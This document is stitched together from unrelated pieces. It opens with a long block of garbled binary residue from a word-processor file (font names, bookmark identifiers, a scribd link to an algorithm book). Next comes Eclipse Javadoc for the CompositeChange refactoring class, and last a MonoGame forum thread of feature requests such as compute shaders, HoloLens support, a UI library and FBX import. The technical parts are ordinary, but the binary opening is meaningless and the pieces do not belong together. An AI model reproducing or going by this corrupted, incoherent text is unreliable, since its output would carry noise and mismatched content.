tJiNmLmLmLmKmKmKlKlKlJlJkJkJkJkJjJjKjKjKiKiKiLiLiLiMiMiMiMiNiNjNjNjNjNkN tSa2aa2S2SapSa2aa2S2SatSMaiaMaiSiSMaMpSMaiaMaiSiSMaMtSaaaSSapSaaaSSa tX"\'Z'Z'Y'Y&Y&Y&X&X&X%X%X%X%X$X$X$X#X#Y#Y#Y#Y#Z"Z"Z"[#[#[#[#\#\#\$\$\$\%\%\%\%\&\&[ ['Z'Z'tNWH]MZM]H\H\H\H[H[HZIZIZIYHYHXHXHWHWHZMdPPNT ArialdPPNT"SystemdPPNT"SystempZ[ZZ[Z ]Z]Y]Y]Y]Y\X\X\X\X[X[X[X[XZXZXZXZYYYYYYYYZYZYZY[Y[Y[Y[Y\Z\Z\Z\Z\[\[\[\[\\\\\\[\[ ][][]Z]Z]tNW]Z]\\\[[ZZZYYXXWWZdPPNT ArialdPPNT"SystemdPPNT"SystempZZ#Z stempZ5Z Z5Z tX2\7Z7Z7Y7Y6Y6Y6X6X6X5X5X5X5X4X4X4X3X3Y3Y3Y3Y3Z2Z2Z2[3[3[3[3\3\3\4\4\4\5\5\5\5 tu 2 2u2u pu 2 2u2u dPPNT"ArialdPPNT"SystemdPPNT"Arial(~"#dPPNT"Systemt 2 u pu u dPPNT"ArialdPPNT"SystemdPPNT"Arial)7bobdPPNT"Systemt tu' B ' BuBu' 'pu' B ' BuBu' 'dPPNT"ArialdPPNT"SystemdPPNT"Arial)8caldPPNT"Syst t " ' ' ' ' & & & & & % % % % $ $ $ # # # # # # " " " # # # # # # $ $ $ % % % % & & t 2 2 2 p 2 2 2 t M i M i i M Mp M i M i i M Mt p t " ' ' ' ' & & & & & % % % % $ $ $ # # # # # # " " " # # # # # # $ $ $ % % % % & & t 22 2 p 22 2 t MiMi i MMp MiMi i MMt 'B'B B ''p 'B'B B ' t"''''&&&&&%%%%$$$######"""######$$$%%%%&& 0dPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial*70dPPNT"SystemdPPNT ArialdPPNT"System 1dPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial*00dPPNT"SystemdPPNT ArialdPPNT"System 1dPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial*2dPPNT"Systemp p p p p"%"9dPPNTCentury Schoolbook, Helvetica .+ndPPNTSymbol, Symbol)=)+)+)+)=dPPNTCentury Schoolbook(1(&1*2(91*4(c2dPPNTT Extra( M ekst W 1990-91 Apple Computer Inc. 1990-91 Bitstream Inc.Copyright 1990-91 Appl Copyright 1990-91 Bitstream Inc.NormaaliCopyright 1990-91 Apple Computer Inc. Copyri 1990-91 Bitstream Inc.1.0@, %Id@QX Y!-,%Id@QX Y!-, P y PXY%%# P y PXY%-,KPX CEDY!-,%E`D-,KSX%%EDY!!-,ED-!!!!fzH NC cF y \ Q S,<EY]deg M\ghij s t S?@DE} )1239;BDKNOPR^_bdhjksz~ @@ (( $$ (( W 29<?CDJYdnu >?DEwx 9:op 12345ij !/mnrs @p @ ]s[]'(V[ t z !!b!c!o!p! ! """""######>#A%%&&''(_(b(( BTP BQ @0 @ @@@@@@@@ @ G@GCGWGZGGII IDIEISI`JdJqL B @ @V`i`p````aaaa)a]aga a clcmcqcrccccccddeeeef @ l @ @X u y W X d f * 2 C I } q s x B:\ @ @T @X 1 3 r # % a n u %>AUt @@ : $ $ $ $ $ x$ $ @$ $ @$ $ $ $ $ $ $ $ $ : < T f RYn 2JYu ytoiic$ $ $ $ $ @@ @!@$ P $ @@ @!@$ P $ @@ @!@$$ @@ @!@$ P $ @@ @!@$ P $ $ $ $ $$ & "$&(),.1489=?EKRSY\cjuv} .@@@@@@@@@@@@@@@* l @ ' .@@@@@@@@@@@@@@@@@@@@ $ 6/0*5G !!"""&#C#J$ &&''(((())))*5*7*F,;,L,M. ./O/P/ / ///000H0N0O0~0 0 00 P * l @ ' .@@@@@@@@@@@@@@@@@@@@<0001122224 7789:<<=>S>T>U>_>i>j>p>w>}> > > > > > > > @@@@@@@@@@@@@@@@@@@ $ l ( @@@@@@@@@@@ $ $xx xx @!@$ @@ P "> > >>>>>>>>>>>>>>>>>>?7?8?U@ @ABCGCNCYCfCvCwC C C C ] " l 4 ?1 @@@@@@@@@@@@@@@@ $ xx( l @ @@@@@@@@@@@@@@@@@@@@ $( l @ @@@@@@@@@@@@@@@$C C CCCCCCCCCCCCCDKDLDRD\DbDlDmDpDvD|D D D D D XVZWW xx " l 4 u TA;@@@@@@@@@@@@@@@@ $=WWWXX/XWXeXgYZTZ~Z Z ZZZZ[[$[/[B[ xx<_ _ _ _ _ _ _ _ _ _ _ _____aaddffffffghiiiiijjkflnnooooOo^q~q sit xx l 4 j@@@@@@@@@@@@@@@ " $A M O ~ I@@@@@@@@@@@@ $" l 4 W I@@@@@@@@@@@@@@@@" # $ $ % & , 7 G V ` a b e g i k m O +@@@@@@@@@@@@@@@@@@@@@@@" l 4 W |@@@@@@@@@@@@@@@@ $ $" l 4 W |@@@@@@@@@@@@! m n u y { } O +@@@@@@@@@@@@@@@@@@@@@@@. l L O +@@@@@@@@@@@@@@@@@@@@@@ $ $. l L O +@@@@@@@@@@@@@@@@@% %6MN]st "5Zjk O +@@@@@@@@@@@@@@@@@@@@@@@ $. l L O +@@@@@@@@@@@@@@@@@@@@@@ $. 34Xmx (./CDw- -.c~ ?Zj{ =\|} 'Qn ,R_u 67Q :x (Rp} Cm =q4 "3TVWst *YZ} .;MSTk} 5O]n +P^(Uy /W 6:NOf $`lm<= 578Sh 12Tf SubHeading Signature 44 @ @ @ (( $ D $ D$ D$ D$ D$ D$ Dx$ Dx$ D @ ! < < < < < < @ < < h x xx x P xx h h + <Zk;<Z[jk @ 0 @L`iqS < !"#$%&'() s) }B_Toc347461014B_Toc347460760B_Toc347460695B_Toc347460659B_Toc347460631B_Toc347460558B_ Toc347471499B_Toc347471389B_Toc347471856B_Toc356911628B_Toc356914183B_Ref357084512B_To c357133632B_Toc357145830B_Toc357147857B_Toc357148473B_Toc357150105B_Toc357764613B_Ref3 57150559B_Ref357074685B_Ref357075750B_Ref357075769B_Ref357076201B_Ref357076383B_Toc356 911629B_Toc356914184B_Toc357133633B_Toc357145831B_Toc357147858B_Toc357148474B_Toc35776 4614B_Toc357150106B_Toc356911630B_Toc356914185B_Toc357133634B_Toc357145832B_Toc3571478 59B_Toc357148475B_Toc357764615B_Toc357150107B_Ref357084306B_Toc356911631B_Toc356914186B _Toc357133635B_Toc357145833B_Toc357147860B_Toc357148476B_Toc357764616B_Toc357150108B_R ef357084721B_Toc356914187B_Toc356911632B_Toc357133636B_Toc357145834B_Toc357147861B_Toc 357148477B_Toc357764617B_Toc357150109B_Ref357130977B_Ref357131004B_Ref357133053B_Toc35 6911633B_Toc356914188B_Toc357133637B_Toc357145835B_Toc357148478B_Toc357147862B_Toc3577 64618B_Toc357150110B_Ref357133341B_Toc356911634B_Toc356914189B_Toc357133638B_Toc357145 836B_Toc357147863B_Toc357148479B_Toc357764619B_Toc357150111B_Toc356911635B_Toc35691419 0B_Toc357133639B_Toc357145837B_Toc357147864B_Toc357148480B_Toc357764620B_Toc357150112B_ Ref357132089B_Ref357133421B_Toc356911636B_Toc356914191B_Toc357133640B_Toc357145838B_To c357147865B_Toc357148481B_Toc357764621B_Toc357150113B_Ref357132123B_Ref357132186B_Ref3 57132229B_Ref357132268B_Toc356911637B_Toc356914192B_Toc357133641B_Toc357145839B_Toc357 147866B_Toc357148482B_Toc357764622B_Toc357150114B_Ref357132329B_Ref357132353B_Toc35691 1638B_Toc356914193B_Toc357133642B_Toc357145840B_Toc357147867B_Toc357148483B_Toc3577646 23B_Toc357150120B_Ref357132373B_Toc356911639B_Toc356914194B_Toc357133643B_Toc357145841B _Toc357147868B_Toc357148484B_Toc357764624B_Toc357150121B_Ref357133499B_Ref357132848B_R ef357132815B_Toc356914196B_Toc357133645B_Toc357145842B_Toc357147869B_Toc357148485B_Toc 357764625B_Toc357150122B_Toc356914197B_Ref357084543B_Ref357084607B_Toc357133646B_Toc35 7145843B_Toc357147870B_Toc357148486B_Toc357764626B_Toc357150123B_Toc356914198B_Toc3571 33647B_Toc357145844B_Ref357146615B_Ref357146659B_Toc357147871B_Toc357148487B_Toc357764 627B_Toc357150124B_Toc356914199B_Toc357133648B_Toc357145845B_Ref357146744B_Ref35714678 4B_Toc357147872B_Toc357148488B_Toc357764628B_Toc357150125B_Toc356914200B_Toc357133649B_ Toc357145846B_Ref357146897B_Ref357146953B_Toc357147873B_Toc357148489B_Toc357764629B_To c357150126B_Toc356914201B_Toc357133650B_Toc357145847B_Ref357147052B_Ref357147108B_Toc3 57147874B_Toc357148490B_Toc357764630B_Toc357150127B_Ref357147631B_Toc357147875B_Toc357 148491B_Toc357764631B_Toc357150128B_Toc356914202B_Toc357133651B_Toc357145848B_Ref35714 7724B_Ref357147741B_Toc357147876B_Toc357148492B_Toc357764632B_Toc357150129B_Toc3569142 03B_Toc357133652B_Toc357145849B_Ref357147788B_Ref357147806B_Toc357147877B_Toc357148493B _Toc357764633B_Toc357150130B_Toc356911640B_Toc356914195B_Toc357133644B_Toc357145850B_T oc357147878B_Toc357148494B_Toc357764634B_Toc357150131<<Gnnnnnnnnnn=--------!!!!!!!!%+>+> < P d $ %` ; F J E FH G\ Hp I J K M L Nh O| P Q R S U K K K< K( RR zzzzzzzzzzzzzzzzzzzG44444444!%!%!%!%!%!%!%!%&+K+K+K+K+K+K+K+K/1=>T>T>T>T>T>T>T>TBDD.
https://ru.scribd.com/document/128681723/Algorithm-Book
CC-MAIN-2019-47
en
refinedweb
Class CompositeChange - java.lang.Object - org.eclipse.ltk.core.refactoring.Change - org.eclipse.ltk.core.refactoring.CompositeChange - All Implemented Interfaces: IAdaptable public class CompositeChange extends ChangeRepresents a composite change. Composite changes can be marked as synthetic. A synthetic composite changes might not be rendered in the refactoring preview tree to save display real-estate. Clients may subclass this class. Constructor Detail CompositeChange public CompositeChange(String name)Creates a new composite change with the given name. - Parameters: name- the human readable name of the change. Will be used to display the change in the user interface CompositeChange public CompositeChange(String name, Change[] children)Creates a new composite change with the given name and array of children. - Parameters: name- the human readable name of the change. Will be used to display the change in the user interface children- the initial array of children Method Detail isSynthetic public boolean isSynthetic()Returns whether this change is synthetic or not. - Returns: trueif this change is synthetic; otherwise false markAsSynthetic public void markAsSynthetic()Marks this change as synthetic. getName public String getName()Returns the human readable name of this change. The name MUST not be null. add public void add(Change change)Adds the given change to the list of children. The change to be added can be null. Adding a "null" change does nothing. - Parameters: change- the change to add addAll public void addAll(Change[] changes)Adds all changes in the given array to the list of children. - Parameters: changes- the changes to add merge public void merge(CompositeChange change)Merges the children of the given composite change into this change. This means the changes are removed from the given composite change and added to this change. - Parameters: change- the change to merge remove public boolean remove(Change change)Removes the given change from the list of children. - Parameters: change- the change to remove - Returns: trueif the change contained the given child; otherwise falseis returned clear public Change[] clear()Removes all changes from this composite change. - Returns: - the list of changes removed from this composite change - Since: - 3.1 getChildren public Change[] getChildren()Returns the children managed by this composite change. - Returns: - the children of this change or an empty array if no children exist setEnabled public void setEnabled(boolean enabled)Sets whether this change is enabled or not. The composite change sends setEnabledto all its children. Client are allowed to extend this method. - Overrides: setEnabledin class Change - Parameters: enabled- trueto enable this change; falseotherwise. The composite change sends initializeValidationDatato all its children. Client are allowed to extend this method. -. The composite change sends isValidto all its children until the first one returns a status with a severity of FATAL. If one of the children throws an exception the remaining children will not receive the isValidcall. Client are allowed to extend this method. - Specified by: isValidin class Change - Parameters: pm- a progress monitor. - Returns: - a refactoring status describing the outcome of the validation check - Throws: CoreException- if an error occurred during validation check. The change is to be treated as invalid if an exception occurs. The composite change sends performto all its enabled children. If one of the children throws an exception the remaining children will not receive the performcall. In this case the method getUndoUntilExceptioncan be used to get an undo object containing the undo objects of all executed children. Client are allowed to extend this method. - Specified by: performin class Change - Parameters: pm- a progress monitor - Returns: - the undo change for this change object or nullif no undo is provided - Throws: CoreException- if an error occurred during change execution internalHandleException protected void internalHandleException(Change change, Throwable t)Note: this is an internal method and should not be overridden outside of the refactoring framework. The method gets called if one of the changes managed by this composite change generates an exception when performed. - Parameters: change- the change that caused the exception t- the exception itself - Restriction: - This method is not intended to be referenced by clients. internalContinueOnCancel protected boolean internalContinueOnCancel()Note: this is an internal method and should not be overridden outside of the refactoring framework. The method gets called if one of the changes managed by this composite change generates an operation canceled exception when performed. - Returns: trueif performing the change should continue on cancel; otherwise false - Since: - 3.1 - Restriction: - This method is not intended to be referenced by clients. internalProcessOnCancel protected boolean internalProcessOnCancel(Change change)Note: this is an internal method and should not be overridden outside of the refactoring framework. The method gets called if the execution of this change got canceled, but internalContinueOnCancelreturned true. - Parameters: change- the change to perform - Returns: trueif the given change should be performed although the execution got canceled; otherwise false - Since: - 3.1 - Restriction: - This method is not intended to be referenced by clients. dispose public void dispose()Disposes this change. Subclasses that override this method typically unregister listeners which got registered during the call to initializeValidationData. Subclasses may override this method. The composite change sends disposeto all its children. It is guaranteed that all children receive the disposecall. getUndoUntilException public Change getUndoUntilException()Returns the undo object containing all undo changes of those children that got successfully executed while performing this change. Returns nullif all changes were executed successfully or if there's nothing to undo. This method is not intended to be overridden or extended. - Returns: - the undo object containing all undo changes of those children that got successfully executed while performing this change, or nullif all changes were executed successfully or if there's nothing to undo. createUndoChange protected Change createUndoChange(Change[] childUndos)Hook to create an undo change. The method should be overridden by clients which provide their own composite change to create a corresponding undo change. - Parameters: childUndos- the child undo. The undo edits appear in the list in the reverse order of their execution. So the first change in the array is the undo change of the last change that got executed. - Returns: - the undo getModifiedElement public Object getModifiedElement()Returns the element modified by this Change. The method may return nullif the change isn't related to an element. - Specified by: getModifiedElementin class Change - Returns: - the element modified by this change. - Since: - 3.2
http://help.eclipse.org/2019-09/topic/org.eclipse.platform.doc.isv/reference/api/org/eclipse/ltk/core/refactoring/CompositeChange.html
CC-MAIN-2019-47
en
refinedweb
rex_noctis I have recently been messing around with the turtlemodule on PC and have come up with a few handy programs. I then became curious about the possibilities on Pythonista. I am attempting to make a simple program where the title will move to where the user taps. The onclick()does not seem to work. I will include the code I was trying to use below. How would I make a program like this and is there any documentation on turtle in Pythonista (I couldn’t find any)? Code: from turtle import * speed(0) screen = Screen() def moveTo(x, y): setpos(x, y) screen.onclick(moveTo) screen.listen() So long story short, I’m good at playing games with touch screen controls and I’m bad with an Xbox controller. However I like slot of Xbox games so this somewhat limits me. So I was wondering if there was some way I could write a programme to connect to my Xbox via Bluetooth and then use custom controls (possible made using scenemodule) to control it instead of the usual physical controller. I’ll divide this up into a few questions to make it a bit simpler. I know there is a sort of controller on the Xbox app but apparently that can’t be used with games. - Is there a module or other way to connect to more advanced devices via Bluetooth (the cbmodule says it’s only for basic Bluetooth devices)? - Would I be able to control the Xbox through this method without having to modify the Xbox in any way? - If it’s looking good so far, what are some of the pieces of code I would need to use (quite specifically)? Thanks in advance. posted in Pythonista • read more rex_noctis @rex_noctis Did you try the 3 Australian voices? speech: en-AU Objective-c: en-AU, Name: Catherine speech: en-AU Objective-c: en-AU, Name: Gordon speech: en-AU Objective-c: en-AU, Name: Karen``` How do I determine between those in the speech.say()line cause they’re all en-AU rex_noctis posted in Pythonista • read more rex_noctis So I am building a text to speech program. It currently says text in the default Daniel Encanced voice. I want the program to say stuff in the Australian Male Siri voice. How would I do that? I have tried speech.say(‘Hello’, ‘en-AU’)but this uses a different Australian voice. Please help. rex_noctis Thanks, it’s working now! rex_noctis I just realised the error. It’s meant to be Rect(self.player.position.x-12, self.player.position.y-12, 24, 24)I forgot the .xon the end of position. Thanks for making me notice it!
https://forum.omz-software.com/user/rex_noctis
CC-MAIN-2019-47
en
refinedweb
import "go.chromium.org/chromiumos/infra/go/internal/osutils" Verify that a directory exists at the given relative path. func FindInPathParents( pathToFind string, startPath string, endPath string, testFunc func(string) bool) string Look for a relative path, ascending through parent directories. Args: pathToFind: The relative path to look for. startPath: The path to start the search from. If |startPath| is a directory, it will be included in the directories that are searched. endPath: The path to stop searching. testFunc: The function to use to verify the relative path. Verify that the given relative path exists. Package osutils imports 2 packages (graph). Updated 2019-11-12. Refresh now. Tools for package owners.
https://godoc.org/go.chromium.org/chromiumos/infra/go/internal/osutils
CC-MAIN-2019-47
en
refinedweb
As an introduction to the big bunch of code below, I think PerformanceAdviser is a misleading name that understates the power of this API feature. While the default rules do focus on performance, you can use it for a wide variety of applications, and your custom rules don’t need to have anything to do with performance. At Revit Forum it was asked if it is possible to retrieve all current warnings from the active document. This can be done with the PerformanceAdviser, but not with the default PerformanceAdviser rules. To do this you will need to make custom rules that match the warnings that Revit creates. For this example, I made a custom rule to detect rooms that are not in properly enclosed regions. Here are screenshots comparing the output from Revit’s standard Review Warnings dialog and the output from the macro below. I’ve tried to be generous with the comments in this code, but please post comments with your questions. Figuring it out the first time is the hardest – creating additional rules is easier. private void Module_Startup(object sender, EventArgs e) { try { // Get the one instance of PerformanceAdviser in the Application PerformanceAdviser pa = PerformanceAdviser.GetPerformanceAdviser(); // Create an instance of the RoomNotEnclosed rule class RoomNotEnclosed roomNotEnclosed = new RoomNotEnclosed(); // Add this roomNotEnclosed rule to the PerformanceAdviser pa.AddRule( roomNotEnclosed.Id, roomNotEnclosed ); } // An exception need to be caught here because compiling the module causes Module_Startup to be invoked, which calls RoomNotEnclosed() // which calls CreateFailureDefinition which is only allowed during Revit start-up. catch (Autodesk.Revit.Exceptions.ApplicationException) {} } public void RunRoomRule() { Document doc = this.ActiveUIDocument.Document; PerformanceAdviser pa = PerformanceAdviser.GetPerformanceAdviser(); string s = ""; // Create a list of rules to run IList<PerformanceAdviserRuleId> ruleList = new List<PerformanceAdviserRuleId>(); // Find the "Room not enclosed" rule in the set of all rules foreach (PerformanceAdviserRuleId ruleId in pa.GetAllRuleIds()) { if (pa.GetRuleName(ruleId) == "Room not enclosed.") { // Add this rule to the list of rules to run ruleList.Add(ruleId); break; } } // Execute the rule and loop through every FailureMessage that results foreach (FailureMessage message in pa.ExecuteRules(doc,ruleList)) { // for each failure get its description and the names & ids of the associated elements s += message.GetDescriptionText() + " Elements:" + getElementsFromList(doc, message.GetFailingElements()) + "\n\n"; } if (s.Length == 0) s = "No warnings found"; TaskDialog.Show("Room Warnings",s); } // This is the implementation of the RoomNotEnclosed. It is derived from the IPerformanceAdviserRule Interface which // defines the methods that must be included. public class RoomNotEnclosed : IPerformanceAdviserRule { private FailureDefinition m_warning; private FailureDefinitionId m_warningId; // The id that uniquely identifies the rule public PerformanceAdviserRuleId Id = new PerformanceAdviserRuleId(new Guid("DB21C266-743E-4771-B783-CC49BE7F2A60")); // The name of the rule public string name = "Room not enclosed."; // This list will hold the ids of elements found by this rule private IList<ElementId> ids; // InitCheck runs once at the beginning of the check. If the rule checks document as a whole (which this rule doesn't), the check can be performed in this method. public void InitCheck(Document document) { // Create the list of ids if it does not already exist if( ids == null ) ids = new List<ElementId>(); // Clear the list of ids if it does already exist else ids.Clear(); } // GetElementFilter gets a filter that restrict the set of elements to be checked. public ElementFilter GetElementFilter(Document document) // I want to filter for only Rooms, but it is not possible to filter on this class // because it is not part of Revit's native object model. Instead we must filter on // SpatialElement, the parent class of Room which also includes the Area and Space classes. { return new ElementClassFilter(typeof(SpatialElement)); } // ExecuteElementCheck runs once for each element that passes the ElementFilter defined in GetElementFilter public void ExecuteElementCheck(Document document, Element element) { // Because of the inability to filter on the Room class, this cast and null check is used to restrict // the check to rooms only. Room room = element as Room; if (room != null && room.Area == 0) ids.Add(room.Id); } // FinalizeCheck runs once at the end of the check. public void FinalizeCheck(Document document) { if (ids.Count > 0) { // Create a new failure message FailureMessage fm = new FailureMessage(m_warningId); // Set the element ids for this failure message fm.SetFailingElements(ids); // Post a warning for this failure message using (Transaction t = new Transaction(document, "Failure")) { t.Start(); PerformanceAdviser.GetPerformanceAdviser().PostWarning(fm); t.Commit(); } } } // Return true because the rule needs to be executed on individual elements. // False would be used if the check applieed to the document instead of individual elements public bool WillCheckElements() { return true; } // This is a constructor that runs when the new object is created public RoomNotEnclosed() { m_warningId = new FailureDefinitionId(new Guid("E7BC1F65-781D-48E8-AF37-1136B62913F5")); m_warning = FailureDefinition.CreateFailureDefinition(m_warningId, FailureSeverity.Warning, name); } public string GetDescription() { return "This room is not enclosed. Volume, area, and perimeter will not be computed."; } public string GetName() { return name; } } private string getElementsFromList(Document doc, ICollection<ElementId> ids) { string s = ""; foreach (ElementId id in ids) { Element e = doc.GetElement(id); s += " " + e.Name + " (" + id + "),"; } // A comma is being added after each element id, but we don't want that comma after the last id return s.TrimEnd(','); }
https://boostyourbim.wordpress.com/category/performanceadviser/
CC-MAIN-2019-47
en
refinedweb
Hi, the “Split”-command for polygons generates a new object containing only the selected polygons. my little script to delete this polygons in the original object does not work anymore since in R21 the selected object is the new one. is there a command for selecting the object above the current selected in the object manager which could be used in python? Normally I copy the commands out of the script log but in this case it does not work. Cheers Simon "split and kill" script in R21? Hi, The parent of an object can be easily obtained via: obj.GetUp() If you would like to have somebody, who knows a bit more about coding, take a look at your script, feel free to contact me via PM. Here’s our Split’n’Kill script: import c4d from c4d import utils # Splits the current polygon selection into a new object # and deletes it from the original object def main(): old = doc.GetActiveObject() c4d.CallCommand(14046, 14046) # Split new = doc.GetActiveObject() doc.SetActiveObject(old) c4d.utils.SendModelingCommand(command=c4d.MCOMMAND_DELETE, list=[old], mode=c4d.MODELINGCOMMANDMODE_POLYGONSELECTION, doc=doc) doc.SetActiveObject(new) # Execute main() if __name__=='__main__': main() There’s no need to select the object above in this case, just save a reference to the currently selected (old) object into a variable before calling the split command, then you can switch between the new and old objects to do the cleanup work.
http://forums.cgsociety.org/t/split-and-kill-script-in-r21/2055213
CC-MAIN-2019-47
en
refinedweb
user=> (map (fn [x] (.toUpperCase x)) (.split "Dasher Dancer Prancer" " ")) ("DASHER" "DANCER" "PRANCER") Clojure has a rich set of data structures. They share a set of properties: They are immutable They are read-able They support proper value equality semantics in their implementation of equals They provide good hash values In addition, the collections: Are manipulated via interfaces. Support sequencing Support persistent manipulation. Support metadata Implement java.lang.Iterable Implement the non-optional (read-only) portion of java.util.Collection nil.. Computation: + - * / user=> (map (fn [x] (.toUpperCase x)) (.split "Dasher Dancer Prancer" " ")) ("DASHER" "DANCER" "PRANCER") Clojure characters are Java Characters. Keywords. Symbols are identifiers that are normally used to refer to something else. They can be used in program forms to refer to function parameters, let bindings, class names and global vars. They have names and optional namespaces, both of which are strings. Symbols can have metadata (see with-meta). Symbols, just like Keywords, implement IFn for invoke() of one argument (a map) with an optional second argument (a default value). For example ('mysym my-hash-map :none) means the same as (get my-hash-map 'mysym :none). See get... (defn hash-ordered [collection] (-> (reduce (fn [acc e] (unchecked-add-int (unchecked-multiply-int 31 acc) (hash e))) 1 collection) (mix-collection-hash (count collection)))) Unordered collections (maps, sets) must use the following algorithm for calculating hasheq. A map entry is treated as an ordered collection of key and value. Note that unchecked-add-int is used to get integer overflow calculations. (defn hash-unordered [collection] (-> (reduce unchecked-add-int 0 (map hash collection)) (mix-collection-hash (count collection)))) The mix-collection-hash algorithm is an implementation detail subject to change.. Create a new map: hash-map sorted-map sorted-map-by 'change' a map: assoc dissoc select-keys merge merge-with zipmap Examine a map: get contains? find keys vals map? Examine a map entry: key val Often many map instances have the same base set of keys, for instance when maps are used as structs or objects would be in other languages. StructMaps support this use case by efficiently sharing the key information, while also providing optional enhanced-performance accessors to those keys. StructMaps are in all ways maps, supporting the same set of functions, are interoperable with all other maps, and are persistently extensible (i.e. struct maps are not limited to their base keys). The only restriction is that you cannot dissociate a struct map from one of its base keys. A struct map will retain its base keys in order. StructMaps are created by first creating a structure basis object using create-struct or defstruct, then creating instances with struct-map or struct. StructMap setup: create-struct defstruct accessor Create individual struct: struct-map struct. Sets are collections of unique values. There is literal support for hash-sets: #{:a :b :c :d} -> #{:d :a :b :c} You can create sets with the hash-set and sorted-set functions: (hash-set :a :b :c :d) -> #{:d :a :b :c} (sorted-set :a :b :c :d) -> #{:a :b :c :d} (set [1 2 3 2 1 2 3]) -> #{1 2 3} Sets are collections: (def s #{:a :b :c :d}) (conj s :e) -> #{:d :a :b :e :c} (count s) -> 4 (seq s) -> (:d :a :b :c) (= (conj s :e) #{:a :b :c :d :e}) -> true Sets support 'removal' with disj, as well as contains? and get, the latter returning the object that is held in the set which compares equal to the key, if found: (disj s :d) -> #{:a :b :c} (contains? s :b) -> true (get s :a) -> :a Sets are functions of their members, using get: (s :b) -> :b (s :k) -> nil Clojure provides basic set operations like union / difference / intersection, as well as some pseudo-relational algebra support for 'relations', which are simply sets of maps - select / index / rename / join.
https://clojure.org/reference/data_structures
CC-MAIN-2017-39
en
refinedweb
For some reason Ruby seems to perform better when facing left recursion. For example: def left_recursive_factorial(number) return 1 if number.zero? left_recursive_factorial(number.pred) * number end def right_recursive_factorial(number) return 1 if number.zero? number * right_recursive_factorial(number.pred) end OK, I am not a YARV hacker of any sort, but here's the difference as I understand it. When you call a method, the sender pushes the method's arguments onto the stack, then the called method pops its arguments off and pushes its return value on. With the recursive call first, the number argument hasn't been pushed onto the stack yet, so the stack of each call takes slightly less space. This is why you can get a few more iterations out of that version, but not drastically more — you're looking at a few percent reduction in stack usage.
https://codedump.io/share/HBtlYVCpGDqq/1/ruby-left-vs-right-recursion
CC-MAIN-2017-39
en
refinedweb
I am getting an error I do not understand, mind you i'm new to coding so this may be a simple error. #include <iostream> using namespace std; int main() { //Initialise Fahrenheit float Fahrenheit = 95.0f; //Initialise Celcius double Celcius = float (Fahrenheit - 32)*0.5556; cout << float Fahrenheit << "F is equal to" << double Celcius << "C" << endl; cin.get(); return 0; } cout << float Fahrenheit << "F is equal to" << double Celcius << "C" << endl; You want to write cout << Fahrenheit << " F is equal to " << Celcius << " C" << endl; You can't add type names when using variables. Once you define a variable you just use it by its name. Btw, casting float to float is superflous. And I fail to see the need to mix doubles and floats. Just use double over float unless you have benchmarks to prove you need the smaller type.
https://codedump.io/share/uIp1ToRDetX4/1/type-name-not-allowedunexpected
CC-MAIN-2017-39
en
refinedweb
Support for ComputeShader? I did not find any information on this topic, which leads me to believe it is not currently supported. Which would be a shame since every modern renderer uses it in one way or another, for me it would be important for light culling for tiled/clustered rendering. It would be nice to have a .Net Core nuget package. And the possebility to install monogame only using nuget, not the installer. Currently, as far as I know, you can't build content without the installed version. You can build the pipeline tool from source if you want. What has blocked us there in the past is getting a solution we could use cross-platform. There just isn't general purpose solution that works on all our target platforms including consoles. Our solution so far has been to encourage people to use 3rd party compute solutions and let them deal with the complexities of supporting their target platforms. For example if DirectX is all you care about you can use the features already in SharpDX to support compute. Really until we fully resolve our shader issues with OpenGL I don't see myself thinking about the compute side of things. Support for Microsoft® HoloLens®:- Microsoft® HoloLens® Project Template for Visual Studio®- Extensions to the MonoGame API (only few required) Thanks. The MonoGame UWP Template works with Hololense already. I tried it All UWP apps work with HoloLens® as a 2D projection.However, if you managed to get it running as a full screen holographic app, then let me know how you managed to do that with MonoGame. Thanks UI would be nice. The only options right now is outdated Xna frameworks, EmptyKeys which is crazy complex (for me anyway) or rolling out your own. A built in UI framework would be so nice, especially for us new to game development. That probably won't happen, at least not in the near future. Squid caught my eye a while ago. It's a C# GUI backend, it might be a good place to start for a simpler alternative to EmptyKeys. I think that I would be cool if we could have a buffer for spritebatch just like we do with vertexbuffers. So something like SpriteBatchBuffer sbb = new sbb(GraphicsDevice); public void CreateWorld() { //or could be ssb.Add() sbb.Draw(mytexture, new Vector2(10,10), Color.White); } public void Draw() { SpriteBatch.Begin(); SpriteBatch.Draw(ssb , Vector2.Zero, Colour.White); SpriteBatch.End(); } If the buffer saved everything on the gpu, We could get a performance increases when using 2d. It would make it very simple for people who just want to use spritebatch. Though I am quite sure that many of the features everyone would like to see implemented would be very beneficial, coming from a software engineering background I would like to see the following items addressed... 1...Complete documentation that is centralized on this site. What is the sense of producing an excellent software tool if you don't have good documentation that even a beginner could use to learn it? Simply providing the API documentation, though needed, is not very good unless everyone understands what and how each method or property means and how each works. People new to game programming won't. Scanning the Internet for hours at a time to learn how to do relatively simple things with Monogame is sort of a stretch. 2...A standard user interface namespace that will allow developers to easily implement various user controls. Every game requires visual controls that will allow the player to interact with it. And if you plan on making games for sale this is a definitive requirement. 1: While not present on the official monogame site, I use all the old XNA articles for monogame, plenty of those floating around that it takes very little time to find documentation. for example.2: It's not integrated, but is what I use and it's amazing. The author is quite dedicated to it as well. Monogame currently uses SharpDx 2.6.3.As of today the latest stable version os SharpDx is 3.0.2 which should have many bugs fixed (and yes, some news ones too I believe). Updating to SharpDx 3 any time soon would be a great benefit as it would support dx12 and all the improvements that comes with it in terms of speed, threading, resources, etc. and this would attract more developers (hopefully) to the community. Concerning the cons: it may have some parts used by MG that have changed, as for example it happens to the new Mathematics library which makes the core dll lightweight.As always, a lot to do, and no timemachine available for all this, as MG must support OpenGL, Android, etc platforms. Support for importing the FBX 2009 format. This was present in XNA but has been left out of MonoGame. I am migrating a big project and we cannot change our model and animation pipeline. The system is too brittle and it would take too long for us to get animations working again. So for now we have to keep our old XNA-based content pipeline in a side project, just for the models. This could be an Assimp feature, not MonoGame which just use it, better to ask Assimp dev team for it. I think autodesk has a tool to convert them to a newer format. Thanks. I looked it up and they do have a free converter tool, which I installed and tested. I will look more into it later. I've just tested it yesterday, and for some reason it changes the path to textures used by the model, adding a ..\ before it... So I had to convert to ASCII to be able to edit this. Don't know if it was already suggested: access to low-level graphics API, ie: SharpDX on windows DX platform, and other API used for others (OpenTK for GL I think, etc) in order to have access to features "denied" by multi-platform choices made, just for those who don't care about some platforms by choice. It could be done by giving a reference to (with the example above) SharpDX reference from graphicDevice instance (according to MG graphicsdevice DirectX, device, context and others are all internal, so I guess they can't be use from a game 